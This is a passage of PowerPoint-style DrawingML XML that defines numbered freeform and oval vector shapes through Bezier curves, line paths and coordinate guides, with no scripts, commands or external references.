                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 68 h 76"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 76"/>
                  <a:gd name="T4" fmla="*/ 12 w 68"/>
                  <a:gd name="T5" fmla="*/ 8 h 76"/>
                  <a:gd name="T6" fmla="*/ 55 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 76"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 6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"/>
                  <a:gd name="T16" fmla="*/ 0 h 76"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 76 h 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" h="76">
                    <a:moveTo>
                      <a:pt x="57" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="76"/>
                      <a:pt x="27" y="70"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="37"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="12" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="6"/>
                      <a:pt x="55" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="39"/>
                      <a:pt x="68" y="59"/>
                      <a:pt x="57" y="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8" name="Freeform 1874"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8285" y="-382"/>
                <a:ext cx="45" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 19"/>
                  <a:gd name="T1" fmla="*/ 18 h 21"/>
                  <a:gd name="T2" fmla="*/ 4 w 19"/>
                  <a:gd name="T3" fmla="*/ 14 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 19"/>
                  <a:gd name="T7" fmla="*/ 6 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 19"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 19 w 19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21">
                    <a:moveTo>
                      <a:pt x="15" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="4" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="4"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="15" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="19" y="16"/>
                      <a:pt x="15" y="1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9" name="Freeform 1875"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8300" y="-368"/>
                <a:ext cx="16" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 5 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 8"/>
                  <a:gd name="T8" fmla="*/ 5 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="8"/>
                      <a:pt x="3" y="7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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="5" y="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0" name="Freeform 1876"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-472"/>
                <a:ext cx="47" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 20"/>
                  <a:gd name="T3" fmla="*/ 41 h 44"/>
                  <a:gd name="T4" fmla="*/ 10 w 20"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 20 w 20"/>
                  <a:gd name="T7" fmla="*/ 41 h 44"/>
                  <a:gd name="T8" fmla="*/ 20 w 20"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 20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44"/>
                  <a:gd name="T20" fmla="*/ 20 w 20"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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44">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="43"/>
                      <a:pt x="4" y="44"/>
                      <a:pt x="10" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="44"/>
                      <a:pt x="20" y="43"/>
                      <a:pt x="20" y="41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1" name="Oval 1877"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-479"/>
                <a:ext cx="47" cy="14"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:pr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2" name="Freeform 1878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8250" y="-571"/>
                <a:ext cx="69" cy="118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 46 h 50"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 46 h 50"/>
                  <a:gd name="T8" fmla="*/ 29 w 29"/>
                  <a:gd name="T9" fmla="*/ 0 h 50"/>
                  <a:gd name="T10" fmla="*/ 0 w 29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9"/>
                  <a:gd name="T19" fmla="*/ 0 h 50"/>
                  <a:gd name="T20" fmla="*/ 29 w 29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9" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="48"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="15" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="50"/>
                      <a:pt x="29" y="48"/>
                      <a:pt x="29" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="29" y="0"/>
                      <a:pt x="2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3" name="Freeform 1879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8234" y="-611"/>
                <a:ext cx="103" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 38 h 44"/>
                  <a:gd name="T4" fmla="*/ 22 w 44"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 44 w 44"/>
                  <a:gd name="T7" fmla="*/ 38 h 44"/>
                  <a:gd name="T8" fmla="*/ 44 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 44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"/>
                  <a:gd name="T19" fmla="*/ 0 h 44"/>
                  <a:gd name="T20" fmla="*/ 44 w 44"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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" h="44">
                    <a:moveTo>
                      <a:pt x="0" y="0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41"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="44"/>
                      <a:pt x="44" y="41"/>
                      <a:pt x="44" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="44" y="0"/>
                      <a:pt x="4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4" name="Freeform 1880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8179" y="-432"/>
                <a:ext cx="158" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 67"/>
                  <a:gd name="T1" fmla="*/ 22 h 74"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 5 h 74"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 5 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 8 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 53 h 74"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 68 h 74"/>
                  <a:gd name="T14" fmla="*/ 35 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 54 w 67"/>
                  <a:gd name="T23" fmla="*/ 22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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="54" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="3" y="39"/>
                      <a:pt x="13" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="60"/>
                      <a:pt x="25" y="65"/>
                      <a:pt x="32" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="74"/>
                      <a:pt x="35" y="74"/>
                      <a:pt x="35" y="74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2" y="70"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="54" y="22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5" name="Freeform 1881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8144" y="-427"/>
                <a:ext cx="160" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 69 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
                  <a:gd name="T4" fmla="*/ 12 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 55 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 69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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="77"/>
                      <a:pt x="26" y="71"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="38"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="12" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="55" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="40"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="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6" name="Freeform 1882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8203" y="-361"/>
                <a:ext cx="42" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 4 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 3 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 18"/>
                  <a:gd name="T7" fmla="*/ 7 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="4" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="15" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="17"/>
                      <a:pt x="15" y="1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7" name="Freeform 1883"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8217" y="-345"/>
                <a:ext cx="14" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:move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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="6" y="6"/>
                      <a:pt x="5" y="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8" name="Freeform 1884"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7775" y="-2189"/>
                <a:ext cx="936" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 396"/>
                  <a:gd name="T1" fmla="*/ 12 h 232"/>
                  <a:gd name="T2" fmla="*/ 77 w 396"/>
                  <a:gd name="T3" fmla="*/ 12 h 232"/>
                  <a:gd name="T4" fmla="*/ 23 w 396"/>
                  <a:gd name="T5" fmla="*/ 44 h 232"/>
                  <a:gd name="T6" fmla="*/ 11 w 396"/>
                  <a:gd name="T7" fmla="*/ 114 h 232"/>
                  <a:gd name="T8" fmla="*/ 11 w 396"/>
                  <a:gd name="T9" fmla="*/ 114 h 232"/>
                  <a:gd name="T10" fmla="*/ 11 w 396"/>
                  <a:gd name="T11" fmla="*/ 115 h 232"/>
                  <a:gd name="T12" fmla="*/ 16 w 396"/>
                  <a:gd name="T13" fmla="*/ 120 h 232"/>
                  <a:gd name="T14" fmla="*/ 298 w 396"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 396 w 396"/>
                  <a:gd name="T17" fmla="*/ 78 h 232"/>
                  <a:gd name="T18" fmla="*/ 77 w 396"/>
                  <a:gd name="T19" fmla="*/ 12 h 2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6"/>
                  <a:gd name="T31" fmla="*/ 0 h 232"/>
                  <a:gd name="T32" fmla="*/ 396 w 396"/>
                  <a:gd name="T33" fmla="*/ 232 h 23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6" h="232">
                    <a:moveTo>
                      <a:pt x="77" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="12"/>
                      <a:pt x="77" y="12"/>
                      <a:pt x="77" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="12"/>
                      <a:pt x="38" y="24"/>
                      <a:pt x="23" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="68"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="11" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="117"/>
                      <a:pt x="14" y="118"/>
                      <a:pt x="16" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="140"/>
                      <a:pt x="106" y="209"/>
                      <a:pt x="298" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="78"/>
                      <a:pt x="396" y="78"/>
                      <a:pt x="396" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="78"/>
                      <a:pt x="278" y="0"/>
                      <a:pt x="77" y="1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9" name="Freeform 1885"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8373" y="-2059"/>
                <a:ext cx="397" cy="448"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 141 w 168"/>
                  <a:gd name="T1" fmla="*/ 21 h 190"/>
                  <a:gd name="T2" fmla="*/ 34 w 168"/>
                  <a:gd name="T3" fmla="*/ 57 h 190"/>
                  <a:gd name="T4" fmla="*/ 28 w 168"/>
                  <a:gd name="T5" fmla="*/ 169 h 190"/>
                  <a:gd name="T6" fmla="*/ 135 w 168"/>
                  <a:gd name="T7" fmla="*/ 133 h 190"/>
                  <a:gd name="T8" fmla="*/ 141 w 168"/>
                  <a:gd name="T9" fmla="*/ 21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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 190"/>
                  <a:gd name="T17" fmla="*/ 168 w 168"/>
                  <a:gd name="T18" fmla="*/ 190 h 1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8" h="190">
                    <a:moveTo>
                      <a:pt x="141" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="0"/>
                      <a:pt x="65" y="16"/>
                      <a:pt x="34" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="98"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="28" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="190"/>
                      <a:pt x="104" y="174"/>
                      <a:pt x="135" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="93"/>
                      <a:pt x="168" y="42"/>
                      <a:pt x="141" y="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0" name="Freeform 1886"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3568" y="-3477"/>
                <a:ext cx="1673" cy="851"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 770 w 1673"/>
                  <a:gd name="T1" fmla="*/ 851 h 851"/>
                  <a:gd name="T2" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T3" fmla="*/ 50 h 851"/>
                  <a:gd name="T4" fmla="*/ 1486 w 1673"/>
                  <a:gd name="T5" fmla="*/ 0 h 851"/>
                  <a:gd name="T6" fmla="*/ 0 w 1673"/>
                  <a:gd name="T7" fmla="*/ 640 h 851"/>
                  <a:gd name="T8" fmla="*/ 770 w 1673"/>
                  <a:gd name="T9" fmla="*/ 851 h 8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73"/>
                  <a:gd name="T16" fmla="*/ 0 h 851"/>
                  <a:gd name="T17" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T18" fmla="*/ 851 h 8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73" h="851">
                    <a:moveTo>
                      <a:pt x="770" y="851"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1673" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="85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1" name="Freeform 1887"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6462" y="-2988"/>
                <a:ext cx="2842" cy="1441"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2842"/>
                  <a:gd name="T1" fmla="*/ 1035 h 1441"/>
                  <a:gd name="T2" fmla="*/ 1495 w 2842"/>
                  <a:gd name="T3" fmla="*/ 1441 h 1441"/>
                  <a:gd name="T4" fmla="*/ 2842 w 2842"/>
                  <a:gd name="T5" fmla="*/ 95 h 1441"/>
                  <a:gd name="T6" fmla="*/ 2492 w 2842"/>
                  <a:gd name="T7" fmla="*/ 0 h 1441"/>
                  <a:gd name="T8" fmla="*/ 1117 w 2842"/>
                  <a:gd name="T9" fmla="*/ 617 h 1441"/>
                  <a:gd name="T10" fmla="*/ 0 w 2842"/>
                  <a:gd name="T11" fmla="*/ 1035 h 14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842"/>
                  <a:gd name="T19" fmla="*/ 0 h 1441"/>
                  <a:gd name="T20" fmla="*/ 2842 w 2842"/>
                  <a:gd name="T21" fmla="*/ 1441 h 144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842" h="1441">
                    <a:moveTo>
                      <a:pt x="0" y="1035"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1495" y="1441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2842" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2492" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10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2" name="Freeform 1888"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2971" y="-3002"/>
                <a:ext cx="6888" cy="2532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2783 w 2916"/>
                  <a:gd name="T1" fmla="*/ 691 h 1072"/>
                  <a:gd name="T2" fmla="*/ 2616 w 2916"/>
                  <a:gd name="T3" fmla="*/ 576 h 1072"/>
                  <a:gd name="T4" fmla="*/ 2088 w 2916"/>
                  <a:gd name="T5" fmla="*/ 533 h 1072"/>
                  <a:gd name="T6" fmla="*/ 97 w 2916"/>
                  <a:gd name="T7" fmla="*/ 5 h 1072"/>
                  <a:gd name="T8" fmla="*/ 91 w 2916"/>
                  <a:gd name="T9" fmla="*/ 3 h 1072"/>
                  <a:gd name="T10" fmla="*/ 90 w 2916"/>
                  <a:gd name="T11" fmla="*/ 3 h 1072"/>
                  <a:gd name="T12" fmla="*/ 90 w 2916"/>
                  <a:gd name="T13" fmla="*/ 3 h 1072"/>
                  <a:gd name="T14" fmla="*/ 25 w 2916"/>
                  <a:gd name="T15" fmla="*/ 37 h 1072"/>
                  <a:gd name="T16" fmla="*/ 14 w 2916"/>
                  <a:gd name="T17" fmla="*/ 115 h 1072"/>
                  <a:gd name="T18" fmla="*/ 14 w 2916"/>
                  <a:gd name="T19" fmla="*/ 115 h 1072"/>
                  <a:gd name="T20" fmla="*/ 14 w 2916"/>
                  <a:gd name="T21" fmla="*/ 115 h 1072"/>
                  <a:gd name="T22" fmla="*/ 20 w 2916"/>
                  <a:gd name="T23" fmla="*/ 121 h 1072"/>
                  <a:gd name="T24" fmla="*/ 27 w 2916"/>
                  <a:gd name="T25" fmla="*/ 125 h 1072"/>
                  <a:gd name="T26" fmla="*/ 908 w 2916"/>
                  <a:gd name="T27" fmla="*/ 690 h 1072"/>
                  <a:gd name="T28" fmla="*/ 1957 w 2916"/>
                  <a:gd name="T29" fmla="*/ 972 h 1072"/>
                  <a:gd name="T30" fmla="*/ 2908 w 2916"/>
                  <a:gd name="T31" fmla="*/ 898 h 1072"/>
                  <a:gd name="T32" fmla="*/ 2783 w 2916"/>
                  <a:gd name="T33" fmla="*/ 691 h 10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916"/>
                  <a:gd name="T52" fmla="*/ 0 h 1072"/>
                  <a:gd name="T53" fmla="*/ 2916 w 2916"/>
                  <a:gd name="T54" fmla="*/ 1072 h 107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916" h="1072">
                    <a:moveTo>
                      <a:pt x="2783" y="691"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2728" y="637"/>
                      <a:pt x="2719" y="606"/>
                      <a:pt x="2616" y="576"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2482" y="537"/>
                      <a:pt x="2154" y="542"/>
                      <a:pt x="2088" y="533"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1935" y="512"/>
                      <a:pt x="222" y="40"/>
                      <a:pt x="97" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="4"/>
                      <a:pt x="93" y="4"/>
                      <a:pt x="91" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="0"/>
                      <a:pt x="43" y="12"/>
                      <a:pt x="25" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="64"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="14" y="115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6" y="117"/>
                      <a:pt x="18" y="120"/>
                      <a:pt x="20" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="123"/>
                      <a:pt x="25" y="124"/>
                      <a:pt x="27" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="198"/>
                      <a:pt x="682" y="629"/>
                      <a:pt x="908" y="690"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1156" y="757"/>
                      <a:pt x="1957" y="972"/>
                      <a:pt x="1957" y="972"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2333" y="1072"/>
                      <a:pt x="2866" y="1052"/>
                      <a:pt x="2908" y="898"/>
